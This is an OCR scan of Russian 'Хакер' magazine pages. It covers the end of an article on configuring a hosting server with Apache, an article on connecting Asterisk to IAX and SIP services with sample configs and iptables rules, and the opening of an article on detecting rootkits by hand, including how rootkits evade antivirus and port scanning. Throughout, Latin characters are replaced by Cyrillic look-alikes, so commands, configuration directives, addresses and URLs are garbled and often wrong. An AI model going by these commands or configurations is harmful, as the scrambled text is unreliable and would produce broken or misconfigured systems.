# изегабб -б. /Ь.оше/пишЬег2 -д Ьозбіпд пишЬег2 

# раззмб пшпЪег2 

Естественно, имя юзера не обязательно должно соответствовать назва- 
нию сайта. Теперь создадим для пользователя домашний каталог и устано- 
вим на него владельца и соответствующие права: 

# ткбіг /Ьоте/пщпЪег2 

# сЬоші питЬег2 /Ь.оше/питЬег2 

# сЬтоб 775 /Ьоте/пшпЪег2 

Здесь нужно создать каталог Ьібосз для хранения файлов сайта, с§і-Ьіп для 
скриптов и журнальные файлы еггог.іо^ и ассезз. 1о§: 

# ткбіг /Ьоте/пшпЪег2 / {Ьббосз , сді-Ьіп} 

# сЬоші питЬег2 /Ьоте/питЪег2/ {ЪРбосз , сді-Ьіп} 

# сЬтоб 775 /Ьоше/пшпЬег2 / {Ърсіосз , сді-Ьіп) 

# еско '###Ьод Ёііе Еог еггог Іоддіпд###' | бее /Ъоте/ 
пшпЪег2 /еггог . Іод 

# есЪо '###Ьод бііе бог ассезз Іоддіпд###' | бее /бюте/ 
пшпЪег2 /ассезз . Іод 

Далее переходим в конфиг АрасЬе и добавляем несколько строчек: 

# ѴІ/ІІ5К/І_0САІ_/АРАСНЕ2/С0МР/НТТР0.С0МР 

#пшпЬег2 

сѴігбиаІНозб пшпЬег2> 

ЗегѵегАбтіп абтіп@питЪег2 . ги 

ЗегѵегЫате питЬег2 

БоситепбКооб " /Ьоше/питЬег2 /Ьббос " 

ЗсгірбАІіаз /сді/ " /Ьоте/пишЬег2/ сді-Ьіп" 

ЕггогЬод /Ьоше/пишЬег2/ еггог . Іод 
СизботЬод /Ьоше/пишЬег2 /ассезз . Іод соттоп 
</ѴігбиаІНозб> 

И немного правим /еПс/ЬозИз, добавляя туда локальный и внешний ІР- 
адрес нашего сайта: 

# ѴІ/ЕТС/Н05Т5 

127.0.0.1 пшпЬег2 
ту . ехб . ір . аббг питЬе г 2 

В конфиге РгоРТРб при этом никаких изменений делать не надо. Все, после 
этого можно смело заходить на Ьцр: //пшпЪег2.ги и на Ьр://пшпЪег2.т . 

ЗАКЛЮЧЕНИЕ 

После того как фундамент готов, можно добавлять панель управления 
хостингом, почтовый сервер и много других примочек на твое усмотре- 
ние. Все зависит только от твоей фантазии. От себя могу только пожелать 
удачи в этом нелегком, но очень прибыльном начинании. Может быть, ты 
когда-нибудь подаришь мне метров 100 халявного хостинга :) . И-Е 
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Под ЗНАКОМ ѴЫР 

ПОДКЛЮЧАЕМ А5ТЕПІ5К К ІАХ- И 5ІР-СЕРВЕРАМ 

Часто компании имеют несколько офисов, удаленных друг от друга. Использовать только один сервер те- 
лефонии в таком случае очень накладно. Кроме того, нельзя забывать о том, что в настоящее время сущес- 
твует достаточно сервисов, предлагающих выход в телефонную сеть по приемлемым тарифам (например, 
зірпеГ.ги) . Подключаясь к ним, можно существенно сэкономить на междугородних телефонных перегово- 
рах и получить прямой номер. Так что давай попробуем подружить наш АзГегізкс ѴоІР-серверами, работаю- 
щими по протоколам ІАХ и 5ІР. 



ПРОБЛЕМЫ И ПРОТОКОЛЫ 

Значок «*» (Астериск), который у программистов и администраторов 
ассоциируется с любой возможной последовательностью, полностью 
отражает подход разработчиков при создании одноименного сервера 
ІР-телефонии. Как результат, ІР-РВХ Азіегізк действительно может быть 
применен практически в любом случае, где уместно упоминание о ѴоІР. 

Он может работать как автономный сервер, обслуживая абонентов своей 
сети, и как шлюз в обычную телефонную или удаленную ѴоІР-сеть. 

Итак, будем считать, что сервер Азіегізк успешно установлен и або- 
ненты уже звонят друг другу (смотри статью «Строим телефонную 
сеть» в 10-м номере «Хакера» за этот год), поэтому сразу переходим 
к настройке связки двух серверов. Первым делом следует побес- 
покоиться о наличии хорошего канала в интернет, обладающего 
достаточной пропускной способностью. Несмотря на то, что ѴоІР-трафик 
спокойно относится к потерям отдельных пакетов, он очень критичен 
к задержкам пакетов в сети, поэтому спутниковые каналы не подойдут. 
Кроме того, желательно иметь хотя бы с одной стороны постоянный ІР- 
адрес, в этом случае проблем с настройками точно не будет. 

Процедура установления связи в ѴоІР (как и используемые термины) 



зависит от протокола. Для связи двух серверов Азіегізк можно исполь- 
зовать протоколы Н.323, 5ІР или ІАХ/ІАХ2 (был еще МССР, но о нем 
вряд ли стоит сегодня говорить). Первая версия Н.323, благодаря 
стараниям ІТП (Іпіегпагіопаі Теіесоішпипісагіопз ІІпіоп), появилась в 
1996 году. И хотя его совершенствование продолжается, большинство 
провайдеров перешли на протокол управления сессиями 5ІР, изначаль- 
но ориентированный на работу в интернете. Предлагаемый разработ- 
чиками новый стандарт позволяет устанавливать пользовательские 
сеансы, включающие передачу голоса, видео, мгновенные сообщения и 
даже онлайн-игры. По сравнению с Н.323, он более легок в реализации, 
независим от транспортного уровня (может работать по ІГОР, ТСР, АТМ 
и другим) . Правда, в нумерации версий 5ІР есть небольшая путаница. 
Первая версия стандарта, получившая обозначение 5ІР 2.0, определена 
в КРС 2543. В КРС 3261 Г т/ѵ\лгѵѵ. іеіі. оге /г1с/г1сЗ 2 61 . ЕхО он был уточнен, 
но номер версии так и остался 2.0. Многие текущие решения основаны 
на промежуточных версиях стандарта. Протокол 5ІР чаще всего ис- 
пользуется провайдерами ѴоІР, поэтому при подключении к сервисам 
вроде аірпеС.ги придется использовать именно этот протокол. 

Протокол ІАХ (Іпіег-Азіегізк еХсЬап^е) разработан как альтернативный 
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Вывод информации о подключенных клиентах 




протокол обмена ѴоІР-данными между АзНегізк. Первая версия протокола 
уже устарела и практически не применяется, поэтому обычно термины 
ІАХ и ІАХ2 обозначают именно вторую версию. ІАХ2 позволяет совмещать 
множество голосовых потоков и передавать их внутри одного канала 
(транка), что уменьшает накладные расходы, связанные с передачей 
заголовков ІР-пакетов, что особенно ощутимо при большом количестве 
звонков. В отличие от Н.323 и ЗІР, он лучше приспособлен к работе через 
ИАТ. Чтобы связать два сервера АзНегізк, это наиболее простой и поэтому 
рекомендуемый вариант. 

Протоколы Н.323 и ІАХ2 стандартизированы полностью, а в ЗІР — только 
сигнализирующая часть, сервисы же могут использовать свои стандарты 
и развиваться любыми группами разработчиков. Более полное описание и 
сравнение этих протоколов можно найти на сайте ѵ\длдѵ.еп.ѵоірбого.сот/5ІР. 

ПОДКЛЮЧАЕМСЯ К ДРУГОМУ СЕРВЕРУ 

Так как у нас два сервера Азіегізк, для организации соединения между 
ними будем использовать протокол ІАХ2. Все настройки работы Азіегізк 
по этому протоколу производятся в файле іах.сопб. Один сервер настра- 
ивается для исходящих звонков — реег, а другой принимает звонки 
— изег. Если вызовы предполагается совершать в обоих направлениях, 
то в конфигурационном файле следует создать две соответствующие 
учетные записи. Можно использовать и тип пользователя Мепб, то есть 
разрешить совершать звонки в обоих направлениях, но тогда создан- 
ная учетная запись сможет принимать вызов только с указанного узла 
(смотри директиву ЬозО, а такой вариант не всегда приемлем. Когда 
один из хостов имеет динамический адрес или работает из-за МАТ, он 
должен зарегистрироваться на втором сервере. Параметры, опреде- 
ленные в секции §епега1, будут действительны для всех клиентов, хотя 
большую часть из них при необходимости можно переопределить в 
индивидуальных секциях. 

$51Ю0 МСЕОІТ /ЕТС/А5ТЕРІ5К/ІАХ.С0ЫР 

[депегаі] 

; порт, на котором принимаются звонки 
;ЪіпсЭрогб=4569 

; ІР-адрес интерфейса, принимающего звонки, иначе про- 
слушиваются все 
;Ъіп<Зас1сІг=192 .168.0.1 

; полезный параметр , снижающий задержки при сложных ди- 
алпланах 
; іахсотраб=уез 

; отключение проверки контрольных сумм ІГОР-пакетов 
; пос1іескзиіпз=по 



; вводим задержки при ошибочном наборе пароля, чтобы за- 
труднить их подбор 
беіаугез есб=уез 

; включаем поддержку великого и могучего 
1апдиаде=ги 

; мелодия при ожидании 
тоМпЦ егрг еб =с1е 1 аи 1 б 
шоЬзиддезб^бебаиІб 

; полоса пропускания Іо ѵі, тесіішп или ЫдЬ., будет влиять 
на используемые кодеки 
Ъапбш- сіб Ъ.= Ы дЬ 

; при помощи директив аііом и біза11оѵ7 указываем разре- 
шенные 

; и запрещенные кодеки, значение аіі соответствует всем 

форматам 

бІ5а11оѵ7=д723 . 1 

<3.1 з аі 1 оѵг= Ірс 1 0 

; установка бита Туре об Зегѵісе (ТОЗ) в исходящих ІР- 
пакетах 

; для ІАХ, в отличие от ЗІР, значение устанавливается для 
всех видов связи 

,- все варианты можно подсмотреть в файле бос/ір_боз . бхб 
боз=1оѵ7СІе1ау 

; если в течение 2000 мс не получаем ответ, соединение 
прерывается 

; вместо уез или по можно указать свое значение в мс 
аибокі11=уез 

; пользователь, принимающий звонки 

[ іпсошіпдизег ] 

буре=изег 

аибЪ=тс15 , ріаіпбехб , гза 
зесгеб=раззѵгогсІ 

; для буре=изег можно использовать несколько записей 
зесгеб 

сопб ехб = іпсошіпд 

; пользователь для исходящих звонков 
[ оибдоіпдизег ] 
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На прилагаемом к 
журналу диске ты 
найдешь примеры 
конфигурационных 
файлов Азіегізк ІР- 
РВХ, а также видео- 
ролик, где показано, 
как подключить свой 
сервер ІР-телефонии 
ксервису зірпеі.ги . 



Ьуре=реег 
Ьо8Ь=1іозЬпаше . сош 

; ЪозБ=с1упатіс ; в этом случае требуется 

команда гедізбег 

аиСІі=тс15 

зесге1:=зесге1:_ж>г<3. 

изегпате=изегпате 

; последние два параметра могут быть включе- 
ны в команду Біаі 

Теперь небольшое пояснение по поводу аілЬ. В ІАХ авто- 
ризация пользователей возможна одним из трех методов. 

При значениях 1ѴГО5 и рІаіпГехі; пароль в файле хранится в 
открытом виде, но в первом случае по сети передается его хэш, 
что препятствует перехвату. Вариант ріаішехг является самым 
незащищенным, поэтому стоит исключить его применение 
в продакшн-системах. При гза для авторизации используется 
связка публичного и приватного ключей. Хотя это и более 
сложный в настройке вариант, но зато он самый защищенный, 
так как расшифровать информацию можно, только получив 
приватный ключ. Список известных публичных ключей с 
расширением риЪ приводится через двоеточие в параметре 
іпкеуз, а приватных — в оідкеу. Если с абонентами выбранного 
узла требуется одновременно вести нескольких разговоров, 
следует установить значение параметра Пттк в уез . 

НАСТРОЙКА ДИАЛ ПЛАНА 

Здесь нужно сделать небольшое замечание по поводу безо- 
пасности, а именно по поводу использования контекстов, к 
которым будут иметь доступ пользователи извне. Если все 
пользователи определены в одном контексте, в том числе и с 
использованием директивы іпсіисіе, то любой звонящий смо- 
жет получить доступ не только к внутренним номерам и серве- 
ру голосовой почты, но и к другим сервисам. Например, у него 
появится возможность совершать исходящие междугородние 
звонки. Не всем и не всегда это необходимо или положено, 
поэтому лучше все правила, относящиеся к звонкам извне или 
наружу, вынести в отдельный контекст, например іпсотіп§. 
Теперь переходим к настройке плана набора. В самом про- 
стом случае в файле ехиепзіопз.сопі можно создать контекст 
іпсотіп§, где просто вписать пользователя, принимающего 
звонки: 

[іпсошіпд] 

ехбеп => дгіпбег , 1 , Біаі ( ІАХ2/дгіпс1ег ) 



А для исходящих создать свой контекст вроде: 

[оибдоіпд] 

ехбеп => 4000 , 1 , Біаі ( ІАХ2 /оибдоіпдизег/4000 ) 

Но такой подход можно использовать при небольшом коли- 
честве номеров. В противном случае проще заставить сервер 
Азіегізк автоматически получать контекст с удаленного 
сервера или перенаправлять вызовы к нему. Соответственно, 
и реализовать это можно несколькими способами. Например, 
чтобы передать свой диалплан на удаленный сервер, исполь- 
зуем конструкцию вроде: 

змібсЪ => ІАХ2/<и8егпате>: [<раззѵгагсЬ>] @<тузег 
ѵег > / <ту сопб ехб > 

При этом параметры изегпате, раззѵѵогсі должны быть 
прописаны в контексте «тусопгехг» іах.сопі на удаленном 
сервере (тузегѵег) . Экстеншены могут быть выражены 
цифрами и буквами или заданы при помощи шаблона. Если 
экстеншен начинается с подчеркивания то он воспринима- 
ется как шаблон. В шаблоне можно использовать некоторые 
специальные символы. Например, X — соответствует числам 
от 0 до 9, 2 — 1-9, N — 2-9, точка соответствует одному 

или нескольким числам, а ' ! ' — нулю или более символов, 
если числа заключены в скобки ( [1237]), то будет принято 
лишь одно из них. Теперь, когда все пояснения даны, приведу 
рабочий пример: 

$ 51Ш0 МСЕйІТ /ЕТС/А5ТЕРІ5К/ЕХТЕМ5І0М5.С0ЫР 

[депегаі] 

збаБіс=уез 

гагіСергоБесі:=по 

; при такой конфигурации можно сохранить диа- 
лплан командой заѵе сііаіріап 
[беіаиІБ] 

ехбеп => _5ХХХХ , 1 , СоБо , оиБ I ${ЕХТЕЫ} I 1 
; описываем план набора для удаленного сер- 
вера, цифра 5 вначале — нечто вроде выхода на 
межгород 
[оиб] 

ехСеп => _5ХХХХ , 1 , ЗСгірМЗБ , 3 

; ЗБгірМЗБ удаляет один символ (по умолчанию) 

с начала номера 

ехСеп => _ХХХХ , 2 , Собо , 1 
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зѵ/іЬсЪ => ІАХ2/оиЬдоіпдизег : зесгеЬмогсЗвЬозЬпате • сот/ 
іпсошіпдизег 

[ іпсотіпд] 

ехЬеп => дгіпсіег , 1 , Біаі ( ІАХ2 /дгіпсіег ) 

Чтобы проверить регистрацию на другом сервере, необходимо ввести в 
СЫ Азіегізк команду іах2 зЬоч/ѵ ге^ізйу. 

Очень полезной при организации связки двух удаленных серверов являет- 
ся возможность ограничения по времени при помощи гітіп§ Іій. Для этого 
следует, используя инструкцию іпсіибе, указать промежуток времени в 
формате: 

сдиапазон времени> | <день недели> | <дни месяца> I <месяц> 

Например, рабочее время с понедельника по пятницу будет выглядеть так: 

іпсіисіе => сіауЬіте 19:00-18:00 Ітоп-ігі | * | * 

ПОДКЛЮЧАЕМСЯ К5ІРЫЕТ.ІШ 

Сегодня доступно большое количество сервисов, которые позволяют 
совершать звонки на стационарные и мобильные телефоны, находящи- 
еся в любой стране мира. Стоимость таких услуг на порядок меньше, чем 
предоставляемые операторами местной проводной связи. Кроме того, 
компания, подключившись к одной из таких ѴоІР-сетей, как правило, 
получает прямой номер во многих городах России и других странах, что 
очень удобно для ее клиентов. Для примера научим сервер Азіегізк под- 
ключаться к сети зірпеЕ.ги . 

Перед настройкой сервера следует создать учетную запись. Заходим на 
сайт сизЕотег.зірпеЬги/саЬіпеіУгеяізГег и заводим себе аккаунт. Для этого 
необходимо заполнить все поля в появившемся окне, ввести контрольное 
число и нажать кнопку «Продолжить регистрацию». После подтвержде- 
ния регистрации в письме, которое придет на указанный етаіі, активиру- 
ется учетная запись со статусом «Тестовый доступ». Выбранным логином 
можно пользоваться в течение 30 дней, после чего следует пополнить 
счет, в противном случае запись будет удалена. Тестовый доступ позво- 
ляет совершать звонки по бесплатным направлениям (стационарные 
телефоны в Москве и Петербурге) и абонентам зірпеі:, последним можно 
отсылать мгновенные сообщения. Чтобы перейти на тарифный план 
«Абонентский доступ» и звонить за пределы России и на мобильные теле- 
фоны, достаточно положить на счет всего 3 у.е. 

При регистрации тебе будет выдан семизначный номер ЗІР ГО плюс 
понадобятся указанные тобой логин и пароль. Предположим, это 
1234567, §гіпбег и раззтігб. Теперь в файл зір.сопі дописываем такие 
строки: 

$ 51ГО0 МСЕйІТ /ЕТС/А5ТЕКІ5К/5ІР.С0ЫР 

[депегаі] 

ѵісІеозиррогЬ=уез 

изегадепЬ=8ірРЬ.опе 

гедізЬег=дгіпсіег :раззж)г<1@зірпеЬ . ги/1234567 
[зірпеЬ] 

Ъуре=1гіепсІ 

изегпате=дгіп(5ег 

зесгеЬ=раззѵгогсі 

са11егісІ=зірпеЬ 

1і05Ь=8ІрпеЬ . ги 

паЬ=по 

1 г отиз ег = з ірпе 1: 

1готсІотаіп=зірпеЬ . г и 

(И:т1то(Зе = г 1 с 2 8 3 3 

іпзесиге=іпѵіЬе 

сопЬехЬ=зірпеЬ 

<1іза11оѵ7=а11 

а11оѵ7=а1аѵ7 



Параметр Іп5есиге=іпѵі1:е позволяет подключаться извне без ввода па- 
роля. Для обозначения типа тонального набора ЭТМР (Биаі Топе МиШ 
Ргедиепсу) используется бйпйпобе с возможными значениями гіс2833, 
іпіо, іпЪапб и аиНо. Параметр ітотботаіп указывает, какой домен будет 
использоваться в заголовках (по умолчанию локальный — ботаіп) . 
Этот параметр необязателен, но некоторые сервисы его требуют. 
Теперь переходим к настройке диалплана. Все городские номера, 
используемые в аірпеі.ги. можно просмотреть в сизЕотег. зірпеі:. 
ги/саЪіпеЕ/бо зЬоѵѵрІкте з. Следует выбрать нужные и прописать их в 
ехІепзіопз.сопТ 

$51Ш0 МСЕйІТ /ЕТС/А5ТЕКІ5К/ЕХТЕМ5І0М5.С0МР 

[МОЗССЖ] 

ехЬеп => _7495ХХХХХХХ, 1 , ЗеЬСаІІегІБ ( "ЗірРЪопе" 
<1234567>) 

ехЬеп => _7495ХХХХХХХ, 2 , Біаі ( ЗІР/ зірпеЬ/ 

$ { ЕХТЕЫ } ,120) 

ехЬеп => _7 4 9 5ХХХХХХХ , 3 , НапдЧр 

И подключаем этот экстеншен в выбранные группы абонентов при помо- 
щи записи: 

іпсіисіе -> Мозсо>7 

Аналогичным образом прописываются планы набора для других городов. 
Закончив с редактированием файлов, вводим в СЫ команду геіоаб. После 
перезапуска Азіегізк в верхнем углу меню «Персональные данные» должна 
появиться информация о подключенном клиенте АзНегізк РВХ (или 
содержимое поля изега^еш) . Команда зір зіюѵѵ гедізігу также покажет, что 
подключение выполнено: 

СЫ> зір зком гедізЬгу 

НозЬ ІІзегпаше РеігезЪ. ЗЬаЬе Ред.Тіше 

зірпеЬ . ги : 5060 дгіпсіег 105 КедізЬегесІ Тие, 16 

ОСЬ 2007 23:10:04 

Теперь можно звонить, используя зірпеі: .ги . 30 



Правила ірнаЫез 

Нелишним будет указать некоторые полезные правила ірІаЫез. Чтобы 
пакеты беспрепятственно проходили через фильтр, пишем: 

Для протокола ЗІР: 

ірІаЫез -АПМРІГГ -р ибр -гл ибр --брой 5004:5082 -) АССЕРТ 
Для протокола ІАХ2 : 

іріаЫез -А ШР17Г -р ибр -т ибр -брогТ 4569 д АССЕРТ 
Медиапотоки КТР: 

іріаЫез -АШР17Г -р ибр -т ибр --брой 10000:20000 д АССЕРТ 

Некоторые используют протокол МССР (тебіа ^аіеѵѵау сопіігоі 
ргоіосоі) : 

ірІаЫез -АШРІГГ -р ибр -т ибр --брой 2727 -] АССЕРТ 

Для установки ТОЗ в исходящих пакетах используем (для ЗІР) такое 
правило: 

ірІаЫез -А ОЦТРІГГ -Г тап^іе -р ибр -т ибр --брой 5060 \ 

-) ОЗСР -зеи-бзср 0x28 

іріаЫез -А ОЦТРЦТ -і тап^іе -р ибр -т ибр --зрой 10000:20000 \ 

-) ЭЗСР --зеГ-бзср 0x28 
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Палим руткиты 

В НИКСАХ И ВИНДЕ 



ручной поиск руткитов в ииііх/хвзо и ыт 

Агрессивное развитие руткитов до сих пор остается безнаказанным и продолжается столь же активно, 
не встречая никакого существенного сопротивления со стороны защитных технологий, большинство из 
которых хорошо работает только на словах и ловит общедоступные руткиты, взятые с гооікііз.сот или 
аналогичных ресурсов. Руткиты, написанные «под заказ», обнаруживаются значительно хуже, если вооб- 
ще обнаруживаются. Причем даже такие продвинутые технологии детекции, как удаленное сканирование 
портов, оказываются бессильными перед новейшими версиями руткитов, которые реально палятся только 
руками, хвостом и головой. 



ыщъх постоянно держит включенным ЬопеуроС на базе 
ѴМѵѵаге, засасывающий кучу малвари. Ее анализ указыва- 
ет на неуклонный рост количества руткитов, обитающих 
исключительно в памяти и не записывающих себя на диск, в 
результате чего у них отпадает необходимость в сокрытии файлов и ветвей 
реестра, прямо или косвенно ответственных за автозагрузку. Они не соз- 
дают новых процессов, предпочитая внедряться в адресное пространство 
уже существующих. Они не открывают новых портов, перехватывая входя- 
щий трафик с помощью сырых сокетов или внедряясь в сетевые драйверы 
(например, в ТСРІР.5У5 или ШІ5.5У5) . 

В результате ни в реестре, ни в файловой системе не происходит ника- 
ких изменений, а значит, ничего прятать не приходится! Естественно, 
перезагрузка убивает руткиты такого типа наповал, и потому многие 
администраторы полагают, что никакой опасности нет. Не так уж сложно 
перезагрузить сервер при возникновении подозрений на его компромета- 
цию. Однако именно установка факта компрометации является первооче- 
редной и самой сложной задачей, стоящей перед администратором. Если 
сервер действительно был скомпрометирован, то необходимо выяснить, 
как именно он был скомпрометирован! В противном случае повторные 
атаки не заставят себя ждать, не говоря уже о том, что после удаления мал- 
вари требуется как минимум изменить пароли на все ресурсы, иначе хакер 
сможет обойтись и без руткита, используя ранее перехваченные пассы. 
Сам по себе руткит обычно не представляет никакой угрозы, и открывать 
удаленный шелл типа ЬасЫоог сейчас уже немодно. А вот завести новую 
учетную запись и добавить ІР-адрес «своего» ргоху-сервера в список 
доверенных адресов — это не только проще, но и надежнее, поскольку, в 
отличие от Ьаскбоог’а, это не обнаруживается ни антивирусами, ни други- 
ми средствами защиты. 



Таким образом, задача сводится к ответу на вопрос: утекли ли наши 
пароли на сторону или нет. К сожалению, в общем случае задача не имеет 
решения. Руткит, обитающий в оперативной памяти и существующий ко- 
роткое время, обнаружить практически невозможно, тем более ручными 
методами. 

Так что мы будем рассматривать лишь долгоживущие руткиты, которых в 
настоящий момент большинство. 

АНТИВИРУСЫ И ДРУГИЕ АВТОМАТИЗИРОВАННЫЕ СРЕДСТВА 

Руткит, известный антивирусу, элементарно обнаруживается путем 
сканирования почтовых вложений или сетевых пакетов, однако даже в 
этом случае у хакера имеется масса способов обломать рога антивирусу. 
Допустим, руткит забрасывается через дыру в браузере, некорректно 
обрабатывающем ТІРР-файлы. Тогда атакующему остается всего лишь 
заманить жертву на ссылку вида кирз ://\ѵ\ѵ\ѵ.хххх. сот, чтобы антивирус 
пропустил нужные сетевые пакеты мимо своих ушей. 

Что же касается поиска активных руткитов, то, даже если они известны 
антивирусу, у них остаются все шансы уйти от возмездия, особенно если 
антивирус знаком руткитам. Вот, например, существует такая интерес- 
ная утилита, как Коогкіг Кеѵеаіег от Марка Руссиновича Гѵѵѵ\дѵ.тісго50^. 
сотЛесЬпеГЛѵзіпГегпаІз/ЦШщез/КоогкігКеѵеаІег.тзрх) . По утверждению 
ее создателя, она обнаруживает все руткиты, представленные на тѵѵѵ. 
гоогкйз.согп, что не соответствует действительности — тривиальная 
проверка выявляет большое количество малвари, отслеживающей запуск 
КооГкіс Кеѵеаіег’а и модифицирующей его код в памяти таким образом, 
чтобы он ничего не показывал. Естественно, подобная техника работает 
только со строго определенными версиями Коогкіг Кеѵеаіег’а (руткит дол- 
жен знать точное расположение машинных команд в памяти) . А поскольку 
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Внешний вид неперехваченной функции 




Внешний вид перехваченной функции 



у разработчиков малвари нет никакого желания отслеживать выход новых 
версий, они ограничиваются атакой типа ѴѴМ_Х, сводящейся к манипуля- 
ции элементами пользовательского интерфейса путем посылки соответ- 
ствующих сообщений (ѴѴіпбоѵѵ Мезза^ез), удаляющих обнаруженные рут- 
киты из списка, отображаемого КооЕкк Кеѵеаіег’ом, что работает со всеми 
версиями. Но в лог-файл обнаруженные руткиты все-таки попадают. 
КтомужеКооиккКеѵеаІег находит только те руткиты, которые: а) модифици- 
руют реестр и/или файловую систему; б) скрывают следы своего присутст- 
вия. Если хотя бы одно из этих условий не выполняется, руткит не будет обна- 
ружен. Анализ кода некоторых руткитов показывает, что они отслеживают 
появление окна КооЕкк Кеѵеаіег’а и прекращают свою маскировку на время 
его работы. Разработчикам защитных утилит уже давно пора взять поли- 
морфизм на вооружение — пока они будут обнаруживаться руткитами, ни о 
какой защите и речи быть не может! Антивирус не должен иметь постоянной 
сигнатуры (равно как и окон с заранее известными заголовками) ! 

Мир руткитов не исчерпывается теми демонстрационными экземплярами, 
что выложены на ѵѵѵѵѵѵ.гоойшз.сот. Суди сам: разработка качественного 
руткита — сложная инженерная задача, и за один вечер такие руткиты 
не пишутся. Торговать руткитами (в силу их полулегального положения) 
отваживаются только самые нуждающиеся (или отчаявшиеся) . Так какой же 
резон выкладывать руткит в общественный доступ? Разве что для того, чтобы 
заявить о себе и посостязаться в крутости с другими хакерами. Но ! Профес- 
сиональные программисты уже давно миновали стадию самоутверждения и, 
вместо того чтобы работать за идею, предпочитают кодить за деньги по инди- 
видуальным заказам (по крайней мере, будет на что нанимать адвоката) . 
Реюз (то есть повторное использование кода) в таких руткитах практиче- 
ски не встречается, и в антивирусные базы попадают лишь немногие. Как 
уже говорилось выше, правильно спланированная атака предполагает 
самоуничтожение руткита по истечении некоторого времени. Да и как его 
ловить, если он существует только в оперативной памяти? ! Можно, конеч- 
но, передавать антивирусным компаниям дамп ядра операционной сис- 
темы, но тут есть три но. Во-первых, какая антивирусная компания будет в 
нем ковыряться? Во-вторых, это же сколько трафика потратит! В-третьих, 
в дампе кроме руткита может находиться тьма секретной информации, 
которую разглашать крайне нежелательно, например пароли. 

Важно понять, что, в отличие от вирусов и червей, распространяющихся 
от компьютера к компьютеру и рано или поздно попадающих в антиви- 
русные капканы, настоящие руткиты существуют в единичных экзем- 
плярах, и потому обнаружить их могут лишь проактивные технологии, 
например эвристический анализ. Однако, если заказчик руткита хоть 
немного дружит с головой, он обязательно проверит, палится ли руткит 
последними версиями антивирусов при самом строгом режиме эвристики 
(при котором антивирус ругается даже на честные программы) , и, если да, 
возвратит его назад на доработку. 

Поэтому в качестве рабочего тезиса необходимо принять, что руткиты 
антивирусами не обнаруживаются, как бы нам ни промывали мозги созда- 
тели антивирусов. 

УДАЛЕННОЕ СКАНИРОВАНИЕ ПОРТОВ 

В эпоху расцвета ЬасЫоог’ов удаленное сканирование портов считалось 
абсолютно надежным методом обнаружения руткитов. Действительно, 
как бы руткит ни маскировал сетевые соединения и какие бы систем- 
ные вызовы ни перехватывал, все это воздействует лишь на локальную 



машину. Да, конечно, можно обмануть и Есрбшпр, и пеЕзЕаЕ, но. . . только 
локально. Всякая же попытка сканирования зараженного компьютера с 
соседней машины немедленно выявит открытые порты, если они, разуме- 
ется, там есть. И руткит никак не может этому противостоять. 

Однако зачем маскировать факт открытия портов, если никакие порты 
можно вообще не открывать, а использовать уже открытые? Мыщъх иссле- 
довал несколько руткитов, которые путем перехвата системных функций 
мониторили НТТР-трафик и передавали на хакерский узел через 80-й порт 
информацию о текущем номере последовательности ТСР/ІР-соединения, 
чтобы хакер мог послать левый пакет (с командами для руткита) , который 
бы воспринимался системой как правильный. А чтобы соединение с 
текущим ѵѵеЪ-узлом не разрывалось, хакер посылал ему еще один пакет, 
предотвращающий срыв синхронизации номера последовательности. 
Другими словами, руткит передавал/принимал данные в контексте сущес- 
твующего ТСР/ІР-соединения, инициированного компьютером-жертвой, 
и потому сканирование портов ничего подозрительного не выявляло, а вот 
внимательный анализ ТСР/ІР-пакетов показал, что пакеты, переданные 
руткитом хакеру, имели ІР-адрес, отличный от ІР-адреса целевого узла, с 
которым и было установлено соединение. 

Однако не стоит обольщаться — не все руткиты такие простые, и при же- 
лании трафик можно спрятать так, что его никто и никогда не найдет. На 
сайте Жанны Рутковской (тѵѵѵ.іпѵізіЪІеЕЫпез.оге/ШоІз.ЬшіГ) выложены 
готовые утилиты, прячущие сам факт присутствия постороннего трафика 
и вдобавок шифрующие его алгоритмом К5А, благодаря которому разбор 
логов Ісрсіитр’а становится пустой тратой времени. 

Выдвигаем следующий тезис: руткиты не открывают новых портов, а 
генерируемый ими трафик ни локальными, ни удаленными сниферами не 
обнаружив ается . 

СВЕТ В КОНЦЕ ТОННЕЛЯ ИЛИ ВСТРЕЧНЫЙ? 

Извечный вопрос: как быть, что делать? ! Побороть новые руткиты стары- 
ми средствами уже не удается, а новых средств, к сожалению, нет. Поэтому 
приходится возвращаться к скомпрометированной машине и искать рут- 
кит непосредственно на ней. Весь вопрос в том, как найти произвольный 
руткит, если о нем заранее ничего не известно? Ни сигнатур, ни других 
опознавательных признаков у нас нет. 

К счастью, существует не так уж много методов перехвата системных 
функций, и все они оставляют за собой вполне осязаемые следы, обнару- 
жить которые можно даже без глубоких знаний особенностей реализации 
операционной системы и ассемблера. Естественно, никаких гарантий у 
нас нет, но все-таки ручной поиск намного надежнее автоматизированно- 
го, пускай он и требует определенной квалификации. Запустить антиви- 
рус может и домохозяйка, что нивелирует разницу между ней и опытным 
хакером, поэтому лучше развивать свои собственные способности, трени- 
ровать «нюх», чем доверять безопасность компьютера чужим дядям. 
Руткиты принято классифицировать по двум основным критериям: по 
месту обитания (ядро или прикладной уровень) и способу внедрения (на- 
пример, перехват функций путем битхака) . Такая классификация очень 
условна, и в реальной жизни сплошь и рядом встречаются гибридные ва- 
рианты, одновременно работающие как на уровне ядра, так и на приклад- 
ном уровне. Забавно, но руткиты, полностью работающие на прикладном 
уровне, обнаружить сложнее всего, поскольку им доступно огромное 
количество методик внедрения в чужие процессы, а для манипуляций с 
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Таблица системных вызовов 

трафиком никаких фикций вообще перехватывать не нужно — достаточ- 
но воспользоваться сырыми сокетами. Но руткиты прикладного уровня 
— это «не круто» и вообще «не по понятиям». Взор хакеров устремлен в 
ядро, в котором можно делать все что угодно. Вот только методик перехва- 
та системных функций там — раз, два и обчелся, а потому обнаружение 
ядерных руткитов представляет собой довольно простую задачу. 

Мы будем говорить именно о руткитах уровня ядра, семейство которых 
делится на два подтипа: одни внедряются путем правки машинного кода, 
вставляя в начало (редко — в середину) функции команду ЛѴІР или САЬЬ 
для перехода на свое тело; а другие модифицируют структуры данных, 
например таблицу системных вызовов, хранящую указатели на функции. 

В №Г оба подтипа руткитов встречаются приблизительно с одинаковой 
частотой. А в Ілпих/хВЗО в основном преобладает второй подтип, что 
связано с тем фактом, что ядро ЫТ экспортирует ЫагіѵеАРІ-функции как 
обычная динамическая библиотека ФЬЬ), а чтобы найти І\Іаі:іѵеАРІ-фун- 
кции в Ілпих/ВЗП, следует очень постараться. Да только зачем стараться, 
если таблица системных вызовов у нас под рукой? ! 

Существует множество утилит, проверяющих целостность таблицы сис- 
темных вызовов и восстанавливающих ее в случае необходимости, но мне 
не известна ни одна утилита, проверяющая целостность самих системных 
